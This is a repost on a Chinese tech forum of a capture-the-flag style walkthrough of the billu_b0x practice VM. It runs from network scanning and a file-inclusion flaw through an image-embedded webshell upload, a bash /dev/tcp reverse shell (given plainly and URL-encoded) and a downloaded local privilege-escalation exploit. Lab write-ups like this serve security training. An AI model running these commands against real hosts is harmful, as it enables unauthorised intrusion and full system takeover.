• 售前

  • 售后

热门帖子
入门百科

靶机渗透【billu_b0x】

[复制链接]
秋天一且 显示全部楼层 发表于 2022-1-12 12:10:54 |阅读模式 打印 上一主题 下一主题
文章目录



一. billu_b0x 靶机安装

1. 靶机下载



  • 百度网盘链接提取码
   billu_b0x.rar
提取码:8whr
  2. 开启靶机



  • 打开 VMware,在左上角选择 - - 文件 - - 打开

  • 找到 billu_b0x 靶机解压位置

  • 开启后如图所示

二. billu_b0x 靶机渗透



  • 开启一台 Kali
    Kali(IP):192.168.110.151
   若未安装 Kali 可点击此处进行安装
虚拟机安装【Kali】(2018/2021)
  1. 信息收集

1)扫描 IP
arp-scan -l
发现目标 IP:192.168.110.154

2)扫描端口
masscan --rate=10000 --ports 0-65535 192.168.110.154
发现目标开启 80,22端口

3)扫描服务
nmap -T4 -sV -O -p 80,22 192.168.110.154
发现目标开启 http,ssh服务

4)扫描域名目录
   Kali下带有一些网站后台目录的字典,为了更好的信息收集,我们选择附带字典
  dirb http://192.168.110.154 /usr/share/wordlists/dirb/big.txt

2. Web渗透

   拿到网站目录后,我们进行一一查看登录
  1)http://192.168.110.154



  • 发现登录点,且提示 " Show me your SQLI skills ",我们尝试 SQL 注入,使用万能密码admin' and '1'='1




  • 登录后显示如上提示,注入失败,更换目录
2)http://192.168.110.154/in



  • 发现 php 配置文件,疑似存在文件包含漏洞

3)http://192.168.110.154/add



  • 发现疑似文件上传点,尝试上传后无反应,更换目录
4)http://192.168.110.154/test



  • 发现此页面可传参 file,但 file 为空,出现 file 疑似存在文件包含,于是我们直接在链接后跟包含



  • 无法包含,可能 GET 传参不行,抓包修改使用 POST 传参




  • 任意包含文件,包含成功



  • 发现此漏洞,我们找到目录的其他子域名进行查看,最终在c.php下发现了疑似数据库用户名密码及库名



  • 在 panel.php 中发现了以POST形式传参的文件包含

4)http://192.168.110.154/phpmy/



  • 发现数据库,尝试用已知信息登录,登录成功
   用户名:billu
密码:b0x_billu
  


  • 先前发现信息中含有 ica_lab 库名,进入查看,最终在 auth 中发现用户名密码



  • 回到最初登录点 http://192.168.110.154 登录
5)http://192.168.110.154/panel.php



  • 登录成功,来到先前发现存在文件包含的网页 panel.php,在Add User选项中发现图片文件上传点,想到上传图片马
6)http://192.168.110.154/uploaded_images/



  • 找到先前发现的图片下载站,随意拿下一张图片,命名为 1.jpg

3. 反弹shell

   写下一句话木马,命名为 2.asp
  

   制作图片马
  

  • 本机打开cmd,切换到 1.jpg 和 2.asp 文件目录下,制作图片马
copy 1.jpg/b+2.asp/a 3.jpg

   回到上传点,上传图片马,上传成功
  
   使用 BP 抓包,点击 continue,拿到如下数据包,扔到 Repeater
  


   看到 load =show 想起先前在此网页发现的以POST形式传参的文件包含如下图,load正是参数值,修改参数值,试探能否执行
  

   发现执行成功,下一步准备用 bash 反弹 shell
  

  • 中间 IP 为 Kali IP,设置一个端口
echo "bash -i >& /dev/tcp/192.168.110.151/5555 0>&1" | bash


  • 此时注意,应先进行 url 编码,打开编码工具,同时 Kali 打开监听
nc -vnlp 5555

%65%63%68%6F%20%22%62%61%73%68%20%2D%69%20%3E%26%20%2F%64%65%76%2F%74%63%70%2F%31%39%32%2E%31%36%38%2E%31%31%30%2E%31%35%31%2F%35%35%35%35%20%30%3E%26%31%22%20%7C%20%62%61%73%68

   将转码复制在 cmd= 后,反弹 shell
  
   回到 Kali ,发现成功拿到 shell
  
4. 提权

   拿到 shell 后,发现只是普通用户,接下来进行提权
  1)查看当前版本
cat /etc/issue

Ubuntu 12.04
2)打开新的终端,使用 Kali 的漏洞扫描库
searchsploit Ubuntu 12.04

37292.c
3)拿下 37292.c 放到自己的网站根目录下
cd /usr/share/exploitdb/exploits/linux/local
cp 37292.c /var/www/html

4)开启 Apache 服务
/etc/init.d/apache2 start

5)回到 shell,因为权限不够,所以切换到临时目录,使用 wget 下载
cd /tmp
wget http://192.168.110.151/37292.c

6)编译执行
gcc 37292.c -o abc
./abc

7)提权
python -c 'import pty;pty.spawn("/bin/bash")'


来源:https://blog.caogenba.net/qq_52576844/article/details/122405136
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

帖子地址: 

回复

使用道具 举报

分享
推广
火星云矿 | 预约S19Pro,享500抵1000!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

草根技术分享(草根吧)是全球知名中文IT技术交流平台,创建于2021年,包含原创博客、精品问答、职业培训、技术社区、资源下载等产品服务,提供原创、优质、完整内容的专业IT技术开发社区。
  • 官方手机版

  • 微信公众号

  • 商务合作